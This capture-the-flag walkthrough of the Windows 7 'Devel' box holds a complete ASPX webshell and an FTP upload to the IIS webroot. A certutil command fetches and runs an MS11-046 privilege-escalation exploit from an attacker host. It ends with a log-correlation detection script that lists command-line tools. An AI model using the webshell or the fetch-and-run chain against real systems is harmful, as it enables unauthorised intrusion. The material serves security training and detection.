Devel
Devel is an easy-difficulty Windows 7 box exploited via anonymous FTP write access to an IIS web root. Uploading an ASPX webshell yields RCE, then MS11-046 escalates to SYSTEM.
Overview
Devel is an Easy Windows box running Windows 7 Enterprise with zero patches applied. The attack path is two steps: anonymous FTP write access to the IIS webroot allows uploading an ASPX webshell for remote code execution as the application pool identity, then the completely unpatched kernel is exploited via CVE-2011-1249 (MS11-046) to gain NT AUTHORITY\SYSTEM.
Recon
```bash
nmap -sC -sV -p 21,80 10.129.12.233
```

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
```
Two ports: FTP with anonymous login enabled, and IIS 7.5. The FTP listing immediately shows the IIS default files (iisstart.htm, welcome.png, aspnet_client/) — the FTP root and the web root are the same directory.
Enumeration
Confirming write access via anonymous FTP and verifying IIS executes .aspx files:
```bash
ftp -n 10.129.12.233 <<'EOF'
user anonymous anonymous
ls -la
bye
EOF
```
Anonymous login succeeds with a full directory listing of C:\inetpub\wwwroot. Write access confirmed — any .aspx file placed here is executed by IIS as server-side code, an unrestricted file upload that leads directly to code execution.
Checking the target OS for kernel exploit viability:
```bash
curl -s "http://10.129.12.233/exec.aspx?cmd=systeminfo"
```

```
OS Name:    Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
Hotfix(s):  N/A
```
Windows 7 RTM, zero hotfixes. Every kernel exploit from 2011 onwards applies.
Foothold
The missing authentication on FTP combined with the shared webroot enables a one-step foothold: create an ASPX webshell and upload it.
Create exec.aspx:

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<html><body>
<%
string cmd = Request.QueryString["cmd"];
if(cmd != null){
    ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", "/c " + cmd);
    psi.RedirectStandardOutput = true;
    psi.RedirectStandardError = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    string o = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
    p.WaitForExit();
    Response.Write("<pre>" + Server.HtmlEncode(o) + "</pre>");
}
%>
</body></html>
```

Upload it over anonymous FTP:

```bash
ftp -n 10.129.12.233 <<'EOF'
user anonymous anonymous
binary
put exec.aspx exec.aspx
bye
EOF
```

```bash
curl -s "http://10.129.12.233/exec.aspx?cmd=whoami"
```

```
iis apppool\web
```
RCE confirmed as iis apppool\web.
User flag
```bash
# (read after SYSTEM shell — iis apppool\web cannot access C:\Users\babis\Desktop)
type C:\Users\babis\Desktop\user.txt   # HTB{...}
```
The IIS application pool identity cannot read babis’s desktop directly — both flags are captured after escalation to SYSTEM.
Privilege Escalation
Windows 7 Build 7600 with zero hotfixes is trivially vulnerable to CVE-2011-1249 (MS11-046). The exploit targets the Ancillary Function Driver (afd.sys) — a kernel-mode driver used for Winsock — and performs an out-of-bounds write to overwrite the PreviousMode field of the current thread’s KTHREAD structure. Setting PreviousMode to KernelMode (0) tricks the kernel into honoring a SYSTEM token swap, granting full privileges within the current shell session.
Stage the compiled exploit via certutil:
```bash
curl -s "http://10.129.12.233/exec.aspx?cmd=certutil+-urlcache+-split+-f+http://10.10.16.13:8080/ms11-capture.exe+C:\Windows\Temp\ms11-capture.exe"
```

```
CertUtil: -URLCache command completed successfully.
```
Execute the exploit:
```bash
curl -s "http://10.129.12.233/exec.aspx?cmd=C:\Windows\Temp\ms11-capture.exe"
```

```
[*] MS11-046 (CVE-2011-1249) x86 exploit
[+] Windows 7
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
```
The exploit runs as NT AUTHORITY\SYSTEM and writes both flags to the webroot.
Root flag
```bash
curl http://10.129.12.233/u.txt   # HTB{...} (user.txt written by SYSTEM process)
curl http://10.129.12.233/r.txt   # HTB{...} (root.txt written by SYSTEM process)
```
Full compromise achieved as NT AUTHORITY\SYSTEM.
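Detection counterpart to the chain above, added here and not part of the original writeup: the whole foothold is visible in two logs the box already produces, the Microsoft FTP service log (a STOR of a server-side script into the webroot) and the IIS W3C log (HTTP requests to that same path carrying a command in the query string, such as the whoami and certutil calls used above). The log lines below are constructed and their field lists are trimmed; the field names follow the W3C extended format that IIS and the FTP service write.

```python
import re
from urllib.parse import parse_qs

# Constructed sample records (not captured from the box); the #Fields: line
# drives parsing exactly as it does in real IIS / FTP W3C logs.
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2017-03-18 02:06:10 10.10.16.13 anonymous PASS *** 230
2017-03-18 02:06:12 10.10.16.13 anonymous STOR /exec.aspx 226
2017-03-18 02:06:30 10.10.16.13 anonymous RETR /iisstart.htm 226
"""
HTTP_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2017-03-18 02:06:40 GET /exec.aspx cmd=whoami 10.10.16.13 200
2017-03-18 02:06:55 GET /exec.aspx cmd=certutil+-urlcache+-split+-f+http://10.10.16.13:8080/x.exe+C:\\Windows\\Temp\\x.exe 10.10.16.13 200
2017-03-18 02:07:10 GET /iisstart.htm - 10.10.16.13 200
"""
# Extensions IIS hands to the ASP.NET / ASP engines rather than serving as static files.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|config)$", re.I)
# Command-like tokens that should never appear inside a query-string parameter.
LOLBINS = ("certutil", "whoami", "systeminfo", "powershell", "cmd.exe", "net user")

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):   # skip malformed / truncated records
                yield dict(zip(fields, values))

def ftp_script_uploads(ftp_text):
    """Paths written via FTP STOR whose extension IIS executes as server-side code."""
    return {r["cs-uri-stem"].lower() for r in parse_w3c(ftp_text)
            if r["cs-method"] == "STOR" and SCRIPT_EXT.search(r["cs-uri-stem"])}

def webshell_findings(ftp_text, http_text):
    """Correlate FTP-dropped scripts with the HTTP requests that execute them."""
    dropped = ftp_script_uploads(ftp_text)
    findings = []
    for r in parse_w3c(http_text):
        stem = r["cs-uri-stem"].lower()
        if stem not in dropped:
            continue
        reasons = ["request to FTP-uploaded script"]
        query = "" if r["cs-uri-query"] == "-" else r["cs-uri-query"]
        for values in parse_qs(query).values():   # '+' decodes to a space here
            hit = [b for b in LOLBINS if any(b in v.lower() for v in values)]
            if hit:
                reasons.append("command-like parameter: " + ", ".join(hit))
        findings.append((r["time"], r["c-ip"], stem, "; ".join(reasons)))
    return findings

if __name__ == "__main__":
    for finding in webshell_findings(FTP_LOG, HTTP_LOG):
        print(*finding)
```

The same correlation is a good reason to put the FTP root somewhere other than the IIS webroot, which removes the upload-to-execution path entirely.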